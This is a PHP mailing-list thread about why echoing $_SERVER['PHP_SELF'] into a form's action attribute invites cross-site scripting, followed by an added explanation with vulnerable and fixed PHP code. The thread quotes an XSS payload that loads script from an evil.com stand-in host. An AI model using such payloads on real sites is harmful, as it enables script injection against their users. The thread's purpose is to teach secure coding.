I love this place, thank you to everyone that posted, I will make changes to make it safer. Thanks again to everyone.

gary

"Jochem Maas" <jochem@xxxxxxxxxxxxx> wrote in message news:4B98DE7E.8020506@xxxxxxxxxxxxxxxx
> On 3/10/10 11:39 PM, Daniel Egeberg wrote:
>> On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban <dmitry@xxxxxxxxx> wrote:
>>> Hi Jochem,
>>>
>>> Jochem Maas wrote:
>>>>
>>>> On 3/10/10 6:23 PM, Joseph Thayne wrote:
>>>>>
>>>>> Looks to me like you are closing your form before you put anything in
>>>>> it. Therefore, the loan_amount is not set, making the value 0. Follow
>>>>> the math, and you are dividing by 1-1.
>>>>>
>>>>> Change this line:
>>>>>
>>>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>"
>>>>> method="post"></form>
>>>>>
>>>>> to:
>>>>>
>>>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
>>>>
>>>> this is an XSS waiting to happen. I can put something like the following
>>>> in the request URI:
>>>>
>>>> index.php?" onsubmit="evil()"><script
>>>> src="http://www.evil.com/evi.js"></script>
>>>>
>>> Apparently it's not going to work. PHP_SELF does not include the query
>>> string.
>>> So it is safe to use it this way.
>>>
>>> Regards,
>>> Dmitry
>>
>> No, it is not safe...
>>
>> This won't work:
>> index.php?" onsubmit="evil()"><script
>> src="http://www.evil.com/evi.js"></script>
>>
>> But this will:
>> index.php/" onsubmit="evil()"><script
>> src="http://www.evil.com/evi.js"></script>
>
> yeah sorry, I was lax and made the query string mistake,
> the issue stands though as Daniel pointed out.
>
> __________ Information from ESET Smart Security, version of virus signature database 4933 (20100310) __________
>
> The message was checked by ESET Smart Security.
>
> http://www.eset.com

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
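As an added illustration of the point Daniel makes in the thread above (example code written for this page, not posted by anyone in the thread): PHP_SELF reflects the request path including any trailing path info, so a request to /index.php/<extra> lands <extra> inside the action attribute unescaped. The $phpSelf value below is a constructed stand-in for $_SERVER['PHP_SELF'], and the function names are my own.

```php
<?php
// Added example: why echoing $_SERVER['PHP_SELF'] into an attribute is
// unsafe, and two ways to fix it. Not code from the mailing-list thread.

// Constructed stand-in for $_SERVER['PHP_SELF'] on a request to
// /index.php/<extra>. PHP_SELF is SCRIPT_NAME plus PATH_INFO, so the extra
// segment (here containing a double quote and a tag) is part of the value.
$phpSelf = '/index.php/"><i>marker</i>';

// Vulnerable form of the line from the thread: the first double quote in
// $phpSelf terminates the action attribute and the rest is parsed as HTML.
function unsafeFormTag(string $phpSelf): string
{
    return '<form action="' . $phpSelf . '" method="post">';
}

// Fix 1: escape before output. ENT_QUOTES encodes both quote styles; the
// charset is named explicitly so the escaping matches the page encoding.
function safeFormTag(string $phpSelf): string
{
    $escaped = htmlspecialchars($phpSelf, ENT_QUOTES, 'UTF-8');
    return '<form action="' . $escaped . '" method="post">';
}

// Fix 2: do not echo request data at all. A form with no action attribute
// submits to the current document URL, which is what PHP_SELF was used for.
function selfPostingFormTag(): string
{
    return '<form method="post">';
}

echo unsafeFormTag($phpSelf), PHP_EOL;
echo safeFormTag($phpSelf), PHP_EOL;
echo selfPostingFormTag(), PHP_EOL;
```

Run it with the PHP CLI and compare the first two lines: in the unsafe output the attribute closes early and the `<i>` tag appears as markup, while in the escaped output the quote becomes `&quot;` and the angle brackets become `&lt;`/`&gt;`, so the whole path stays inside the attribute value. The second fix is the simpler one when the form only ever posts back to itself, and it is the one that removes the reflected input entirely rather than encoding it.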